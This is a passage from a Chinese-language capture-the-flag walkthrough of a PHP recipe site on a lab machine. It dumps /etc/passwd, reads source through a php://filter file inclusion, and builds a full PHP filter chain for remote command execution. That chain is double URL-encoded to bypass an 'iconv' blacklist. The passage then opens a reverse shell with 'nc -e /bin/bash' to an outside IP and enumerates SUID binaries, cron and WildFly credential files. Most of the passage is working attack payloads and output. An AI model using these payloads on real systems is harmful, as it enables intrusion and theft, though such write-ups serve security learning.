daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndnsmasq:x:103:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\npolkitd:x:996:996:polkit:\/nonexistent:\/usr\/sbin\/nologin\ntod:x:1002:1002:,,,:\/home\/tod:\/bin\/zsh<\/code><\/pre>\n\u770b\u5230tod<\/code>\u7528\u6237\u3002<\/p>\nfilter\u94fe\u63d0\u53d6\u6587\u4ef6<\/h3>\n
\u5c1d\u8bd5\u4f7f\u7528filter<\/code>\u63d0\u53d6\u51fa\u6765recipe.php<\/code>\uff1a<\/p>\nhttp:\/\/10.161.16.19\/recipe.php?file=php:\/\/filter\/read=convert.base64-encode\/resource=recipe.php<\/code><\/pre>\nCjwhRE9DVFlQRSBodG1sPgo8aHRtbCBsYW5nPSJmciI+CjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0iVVRGLTgiPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPkZvb2Q8L3RpdGxlPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjMuNi9jc3MvYm9vdHN0cmFwLm1pbi5jc3MiIC8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vbWF4Y2RuLmJvb3RzdHJhcGNkbi5jb20vZm9udC1hd2Vzb21lLzQuNi4zL2Nzcy9mb250LWF3ZXNvbWUubWluLmNzcyIgLz4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL2ZsYXRpY29uLmNzcyIgLz4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL2FuaW1hdGUuY3NzIj4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iY3NzL2Jvb3RzbmF2LmNzcyI+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImNzcy9jb2xvci5jc3MiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJjc3MvY3VzdG9tLmNzcyIgLz4KPC9oZWFkPgo8Ym9keSBkYXRhLXNweT0ic2Nyb2xsIiBkYXRhLXRhcmdldD0iI25hdmJhci1tZW51IiBkYXRhLW9mZnNldD0iMTAwIj4KICAgIDxuYXYgY2xhc3M9Im5hdmJhciBuYXZiYXItZGVmYXVsdCBib290c25hdiBuby1iYWNrZ3JvdW5kIG5hdmJhci1maXhlZCBibGFjayI+CiAgICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibmF2YmFyLWhlYWRlciI+CiAgICAgICAgICAgICAgICA8YSBjbGFzcz0ibmF2YmFyLWJyYW5kIiBocmVmPSIjIj48aW1nIHNyYz0iaW1hZ2VzL2xvZ28ucG5nIiBjbGFzcz0ibG9nbyIgYWx0PSIiPjwvYT4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L25hdj4KICAgIDxzZWN0aW9uIGlkPSJibG9jayI+CiAgICAgICAgPGRpdiBjbGFzcz0iY29udGFpbmVyIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1tZC04IGNvbC1tZC1vZmZzZXQtMiI+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZmVhdHVyZSI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxoMT5XZWxjb21lICE8L2gxPgoJCQk8cCBzdHlsZT0iY29sb3I6IHJlZDsgZm9udC13ZWlnaHQ6IGJvbGQ7Zm9udC1zaXplOiAyNHB4OyI+Q2hvb3NlIGEgcmVjaXBlIDo8L3A+CiAgICAgICAgICAgICAgICAgICAgICAgIDx1bCBjbGFzcz0ibGlzdC1ncm91cCI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9Imxpc3QtZ3JvdXAtaXRlbSI+PGEgaHJlZj0iP2ZpbGU9ZmF0dHktYnVyZ2VyLnBocCI+RmF0dHkgQnVyZ2VyPC9hPjwvbGk+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9Imxpc3QtZ3JvdXAtaXRlbSI+PGEgaHJlZj0iP2ZpbGU9c2hhY2stYnVyZ2VyLnBocCI+U2hhY2sgQnVyZ2VyPC9hPjwvbGk+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8bGkgY2xhc3M9Imxpc3QtZ3JvdXAtaXRlbSI+PGEgaHJlZj0iP2ZpbGU9Y2hlZGRhci1idXJnZXIucGhwIj5DaGVkZGFyIEp1bmt5IFN0dWZmZWQgQnVyZ2VyczwvYT48L2xpPgogICAgICAgICAgICAgICAgICAgICAgICA8L3VsPgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgPC9zZWN0aW9uPgoKICAgIDxzY3JpcHQgc3JjPSJodHRwOi8vY29kZS5qcXVlcnkuY29tL2pxdWVyeS0xLjEyLjEubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjMuNi9qcy9ib290c3RyYXAubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJqcy9ib290c25hdi5qcyI+PC9zY3JpcHQ+CjwvYm9keT4KPC9odG1sPgoKCjw\/cGhwCmluaV9zZXQoJ2FsbG93X3VybF9pbmNsdWRlJywgJzAnKTsKCmZ1bmN0aW9uIGlzRm9yYmlkZGVuKCRpbnB1dCkgewogICAgcmV0dXJuIHN0cmlwb3MoJGlucHV0LCAiaWNvbnYiKSAhPT0gZmFsc2U7Cn0KCmlmKGlzc2V0KCRfR0VUWydmaWxlJ10pKSB7CiAgICAkZmlsZSA9ICRfR0VUWydmaWxlJ107CgogICAgaWYgKGlzRm9yYmlkZGVuKCRmaWxlKSkgewogICAgICAgIGVjaG8gIjxkaXYgY2xhc3M9J2NvbnRhaW5lcic+PGRpdiBjbGFzcz0nYWxlcnQgYWxlcnQtZGFuZ2VyJz5BY2Nlc3MgZGVuaWVkICE8L2Rpdj48L2Rpdj4iOwogICAgfSBlbHNlaWYgKHN0cm5jbXAoJGZpbGUsICIvIiwgMSkgIT09IDAgJiYgc3RybmNtcCgkZmlsZSwgIi4uIiwgMikgIT09IDApIHsKICAgICAgICBAaW5jbHVkZSgkZmlsZSk7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxkaXYgY2xhc3M9J2NvbnRhaW5lcic+PGRpdiBjbGFzcz0nYWxlcnQgYWxlcnQtZGFuZ2VyJz5BY2Nlc3MgZGVuaWVkICE8L2Rpdj48L2Rpdj4iOwogICAgfQp9Cj8+Cg==<\/code><\/pre>\n\u89e3\u7801\u4e00\u4e0b\uff1a<\/p>\n
<!DOCTYPE html>\n<html lang="fr">\n<head>\n <meta charset="UTF-8">\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <title>Food<\/title>\n <link rel="stylesheet" href="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.6\/css\/bootstrap.min.css" \/>\n <link rel="stylesheet" href="https:\/\/maxcdn.bootstrapcdn.com\/font-awesome\/4.6.3\/css\/font-awesome.min.css" \/>\n <link rel="stylesheet" href="css\/flaticon.css" \/>\n <link rel="stylesheet" href="css\/animate.css">\n <link rel="stylesheet" href="css\/bootsnav.css">\n <link rel="stylesheet" href="css\/color.css">\n <link rel="stylesheet" href="css\/custom.css" \/>\n<\/head>\n<body data-spy="scroll" data-target="#navbar-menu" data-offset="100">\n <nav class="navbar navbar-default bootsnav no-background navbar-fixed black">\n <div class="container">\n <div class="navbar-header">\n <a class="navbar-brand" href="#"><img src="images\/logo.png" class="logo" alt=""><\/a>\n <\/div>\n <\/div>\n <\/nav>\n <section id="block">\n <div class="container">\n <div class="row">\n <div class="col-md-8 col-md-offset-2">\n <div class="feature">\n <h1>Welcome !<\/h1>\n <p style="color: red; font-weight: bold;font-size: 24px;">Choose a recipe :<\/p>\n <ul class="list-group">\n <li class="list-group-item"><a href="?file=fatty-burger.php">Fatty Burger<\/a><\/li>\n <li class="list-group-item"><a href="?file=shack-burger.php">Shack Burger<\/a><\/li>\n <li class="list-group-item"><a href="?file=cheddar-burger.php">Cheddar Junky Stuffed Burgers<\/a><\/li>\n <\/ul>\n <\/div>\n <\/div>\n <\/div>\n <\/div>\n <\/section>\n\n <script src="http:\/\/code.jquery.com\/jquery-1.12.1.min.js"><\/script>\n <script src="https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.6\/js\/bootstrap.min.js"><\/script>\n <script src="js\/bootsnav.js"><\/script>\n<\/body>\n<\/html>\n\n<?php\nini_set('allow_url_include', '0');\n\nfunction isForbidden($input) {\n return stripos($input, "iconv") !== false;\n}\n\nif(isset($_GET['file'])) {\n $file = $_GET['file'];\n\n if (isForbidden($file)) {\n echo "<div class='container'><div class='alert alert-danger'>Access denied !<\/div><\/div>";\n } elseif (strncmp($file, "\/", 1) !== 0 && strncmp($file, "..", 2) !== 0) {\n @include($file);\n } else {\n echo "<div class='container'><div class='alert alert-danger'>Access denied !<\/div><\/div>";\n }\n}\n?>\n<\/code><\/pre>\n\u5bf9iconv<\/code>,\/<\/code>,..<\/code>\u8fdb\u884c\u4e86\u8fc7\u6ee4\uff0c\u5c1d\u8bd5\u751f\u6210\u4e00\u4e2afilter<\/code>\u94fe\u5199\u5165\u9a6c\uff1ahttps:\/\/github.com\/synacktiv\/php_filter_chain_generator<\/a><\/p>\n\u5c1d\u8bd5\u751f\u6210\u4e00\u4e2a\u77ed\u4e00\u70b9\u7684\u94fe\uff0c\u4e0a\u6b21\u592a\u957f\u4e86\u8f93\u5165\u4e0d\u4e86\uff1a<\/p>\n
python3 .\/php_filter_chain_generator.py --chain '<?=`$_GET[0]` ?>'<\/code><\/pre>\nphp:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp?0=whoami<\/code><\/pre>\n\u4f46\u662f\u8fd9\u6837\u662f\u4e0d\u591f\u7684\uff0c\u4e0a\u9762\u7981\u6b62\u4e86iconv<\/code>\uff0c\u6211\u4eec\u8fd8\u5f97\u8fdb\u884c\u4e8c\u6b21\u7f16\u7801\u4ee5\u7ed5\u8fc7\uff1a<\/p>\n\ni<\/code>\u7684\u5341\u516d\u8fdb\u5236\u7f16\u7801\u65b9\u5f0f\u4e3a%69<\/code>,%<\/code>\u7684\u5341\u516d\u8fdb\u5236\u7f16\u7801\u4e3a%25<\/code>\uff0c\u8fd9\u91cc\u5982\u679c\u53ea\u7f16\u7801\u4e00\u6b21\uff0c\u4ecd\u7136\u4f1a\u88ab\u6d4f\u89c8\u5668\u8bc6\u522b\u4e3aiconv<\/code>\uff0c\u4ece\u800c\u88ab\u62e6\u622a\u3002<\/p>\n<\/blockquote>\niconv\n%2569conv<\/code><\/pre>\nhttp:\/\/10.161.16.19\/recipe.php?file=php:\/\/filter\/convert.%2569conv.UTF8.CSISO2022KR|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM921.NAPLPS|convert.%2569conv.855.CP936|convert.%2569conv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.IBM869.UTF16|convert.%2569conv.L3.CSISO90|convert.%2569conv.UCS2.UTF-8|convert.%2569conv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.8859_3.UTF16|convert.%2569conv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.865.UTF16|convert.%2569conv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP861.UTF-16|convert.%2569conv.L4.GB13000|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.UTF16LE|convert.%2569conv.UTF8.CSISO2022KR|convert.%2569conv.UCS2.UTF8|convert.%2569conv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.PT.UTF32|convert.%2569conv.KOI8-U.IBM-932|convert.%2569conv.SJIS.EUCJP-WIN|convert.%2569conv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CP367.UTF-16|convert.%2569conv.CSIBM901.SHIFT_JISX0213|convert.%2569conv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.CSIBM1161.UNICODE|convert.%2569conv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.ISO2022KR.UTF16|convert.%2569conv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.INIS.UTF16|convert.%2569conv.CSIBM1133.IBM943|convert.%2569conv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.%2569conv.SE2.UTF-16|convert.%2569conv.CSIBM1161.IBM-932|convert.%2569conv.MS932.MS936|convert.%2569conv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.%2569conv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&0=whoami<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u53cd\u5f39shell<\/h3>\n
\u51fa\u73b0www-data<\/code>\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\nnc -e \/bin\/bash 10.160.220.139 1234<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u6269\u5c55shell<\/h3>\npython3 -c 'import pty;pty.spawn("\/bin\/bash")'<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nwww-data@wild:\/var\/www\/html$ whoami;id\nwhoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nwww-data@wild:\/var\/www\/html$ ls -la\nls -la\ntotal 68\ndr-xr-xr-x 7 root root 4096 Nov 4 14:01 .\ndrwxr-xr-x 3 root root 4096 Nov 1 09:49 ..\ndrwxrwxr-x 3 www-data www-data 4096 Nov 1 19:24 __MACOSX\n-rwx------ 1 www-data www-data 22 Nov 1 19:24 about.php\n-rwx------ 1 www-data www-data 1586 Nov 1 19:24 cheddar-burger.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 1 19:24 css\n-rwx------ 1 www-data www-data 1897 Nov 1 19:24 fatty-burger.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 1 19:24 fonts\ndrwxr-xr-x 2 www-data www-data 4096 Nov 1 19:24 images\n-rwx------ 1 www-data www-data 19390 Nov 1 19:24 index.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 1 19:24 js\n-rwx------ 1 www-data www-data 2626 Nov 1 19:24 recipe.php\n-rwx------ 1 www-data www-data 1582 Nov 1 19:24 shack-burger.php\nwww-data@wild:\/var\/www\/html$ cd ..\/\ncd ..\/\nwww-data@wild:\/var\/www$ ls -la\nls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Nov 1 09:49 .\ndrwxr-xr-x 12 root root 4096 Oct 23 09:25 ..\ndr-xr-xr-x 7 root root 4096 Nov 4 14:01 html\nwww-data@wild:\/var\/www$ cd ..\/;ls -la\ncd ..\/;ls -la\ntotal 48\ndrwxr-xr-x 12 root root 4096 Oct 23 09:25 .\ndrwxr-xr-x 18 root root 4096 Jul 22 2023 ..\ndrwxr-xr-x 2 root root 4096 Nov 3 09:31 backups\ndrwxr-xr-x 14 root root 4096 Oct 23 12:28 cache\ndrwxr-xr-x 35 root root 4096 Oct 23 12:28 lib\ndrwxrwsr-x 2 root staff 4096 Mar 2 2023 local\nlrwxrwxrwx 1 root root 9 Jun 15 2023 lock -> \/run\/lock\ndrwxr-xr-x 9 root root 4096 Mar 29 04:30 log\ndrwxrwsr-x 2 root mail 4096 Jun 15 2023 mail\ndrwxr-xr-x 2 root root 4096 Jun 15 2023 opt\nlrwxrwxrwx 1 root root 4 Jun 15 2023 run -> \/run\ndrwxr-xr-x 4 root root 4096 Jun 15 2023 spool\ndrwxrwxrwt 2 root root 4096 Mar 29 05:35 tmp\ndrwxr-xr-x 3 root root 4096 Nov 1 09:49 www\nwww-data@wild:\/var$ mail\nmail\nbash: mail: command not found\nwww-data@wild:\/var$ find \/ -perm -u=s -type f 2>\/dev\/null\nfind \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/sbin\/pppd\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\nwww-data@wild:\/var$ cat cron*\ncat cron*\ncat: 'cron*': No such file or directory\nwww-data@wild:\/var$ cat \/etc\/cron*\ncat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.daily; }\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.weekly; }\n52 6 1 * * root test -x \/usr\/sbin\/anacron || { cd \/ && run-parts --report \/etc\/cron.monthly; }<\/code><\/pre>\n\u6bdb\u90fd\u6ca1\u6709\uff0c\u7ee7\u7eed\u627e\u5176\u4ed6\u7528\u6237\u5427\uff0c\u67e5\u770b\u4e00\u4e0b8080<\/code>\u7aef\u53e3\uff1a<\/p>\n\u5bfb\u627e\u914d\u7f6e\u6587\u4ef6<\/h3>\n\nWildFly\u662f\u4e00\u4e2a\u57fa\u4e8eJavaEE\u7684\u5f00\u6e90\u8f7b\u91cf\u7ea7\u5e94\u7528\u670d\u52a1\u5668<\/strong>\u3002\u5b83\u63d0\u4f9b\u4e86\u8fd0\u884cJava Web\u5e94\u7528\u7a0b\u5e8f\u6240\u9700\u7684\u6240\u6709\u529f\u80fd\uff0c\u662fJVM\u7684\u6269\u5c55\uff0c\u5177\u6709\u5b8c\u6574\u7684\u8fd0\u884c\u65f6\u73af\u5883\uff0c\u80fd\u591f\u5728\u4e00\u7aef\u521b\u5efa\u6570\u636e\u5e93\u5230\u53e6\u4e00\u7aef\u7684Web\u5ba2\u6237\u7aef\u7684\u8fde\u63a5\u3002WildFly\u7531Red Hat\u8bbe\u8ba1\u548c\u7ef4\u62a4\uff0c\u5176\u6b63\u5f0f\u540d\u79f0\u4e3aJBoss AS\u3002<\/p>\n\u4f5c\u4e3a\u4e00\u4e2a\u5168\u529f\u80fd\u7684\u5e94\u7528\u670d\u52a1\u5668\uff0cWildFly\u5177\u6709\u65e0\u4e0e\u4f26\u6bd4\u7684\u901f\u5ea6\uff0c\u5305\u62ec\u5feb\u901f\u542f\u52a8\u3001\u65e0\u9650\u7684\u7f51\u7edc\u6027\u80fd\u548c\u53ef\u6269\u5c55\u6027\u3002\u540c\u65f6\uff0c\u5b83\u975e\u5e38\u8f7b\u91cf\u7ea7\uff0c\u5177\u6709\u7626\u5185\u5b58\u7ba1\u7406\u548c\u53ef\u5b9a\u5236\u7684\u8fd0\u884c\u65f6\u95f4\u3002WildFly\u8fd8\u5177\u6709\u5f3a\u5927\u7684\u7ba1\u7406\u80fd\u529b\uff0c\u5305\u62ec\u7edf\u4e00\u7684\u914d\u7f6e\u548c\u7ba1\u7406\u3002\u8fd9\u4e9b\u7279\u70b9\u4f7f\u5f97WildFly\u80fd\u591f\u7f29\u77ed\u5f00\u53d1\u65f6\u95f4\uff0c\u66f4\u6709\u6548\u5730\u7ba1\u7406\u8d44\u6e90\uff0c\u5e76\u4e3a\u7528\u6237\u8282\u7701\u8d44\u91d1\u3002<\/p>\n
\u6b64\u5916\uff0cWildFly\u662f\u4e00\u4e2a\u7075\u6d3b\u7684\u5bb9\u5668\u548c\u670d\u52a1\u5668\uff0c\u7528\u4e8e\u7ba1\u7406EJB\uff0c\u4f46JBoss\u6838\u5fc3\u670d\u52a1\u5e76\u4e0d\u5305\u62ec\u652f\u6301servlet\/JSP\u7684WEB\u5bb9\u5668\uff0c\u56e0\u6b64\u4e00\u822c\u4e0eTomcat\u6216Jetty\u7ed1\u5b9a\u4f7f\u7528\u3002\u603b\u7684\u6765\u8bf4\uff0cWildFly\u4e3aJava Web\u5e94\u7528\u7a0b\u5e8f\u7684\u5f00\u53d1\u548c\u90e8\u7f72\u63d0\u4f9b\u4e86\u4e00\u4e2a\u5f3a\u5927\u7684\u3001\u7075\u6d3b\u7684\u548c\u5f00\u6e90\u7684\u5e73\u53f0\u3002<\/p>\n<\/blockquote>\n
\u6709\u4e00\u4e2a\u767b\u5f55\u754c\u9762\u9700\u8981\u8d26\u53f7\u5bc6\u7801\uff0c\u800c\u524d\u9762\u53c8\u6709\u4e00\u4e2a\u6587\u4ef6\u5305\u542b\uff0c\u81ea\u7136\u800c\u7136\u60f3\u5230\u53bb\u8bfb\u53d6\u914d\u7f6e\u6587\u4ef6\uff0c\u6240\u4ee5\u6211\u4eec\u8981\u7ffb\u770b\u624b\u518c\u627e\u4e00\u4e0b\u914d\u7f6e\u6587\u4ef6\u5728\u54ea\uff0c\u6216\u8005\u76f4\u63a5google\uff1a<\/p>\n
<\/div>
\n<\/div>
\n<\/div><\/p>\n\u5f97\u5230\u4e86\u4e00\u4e2a\u5927\u6982\u7684\u5730\u5740\uff1a<\/p>\n
\\{ jboss.home}\/standalone\/configuration\/mgmt-users.properties\n \\{ jboss.home}\/domain\/configuration\/mgmt-users.properties<\/code><\/pre>\n\u4e4b\u524d\u6211\u4eec\u62ff\u5230\u4e86shell\uff0c\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\u76f8\u5173\u6587\u4ef6\uff1a<\/p>\n
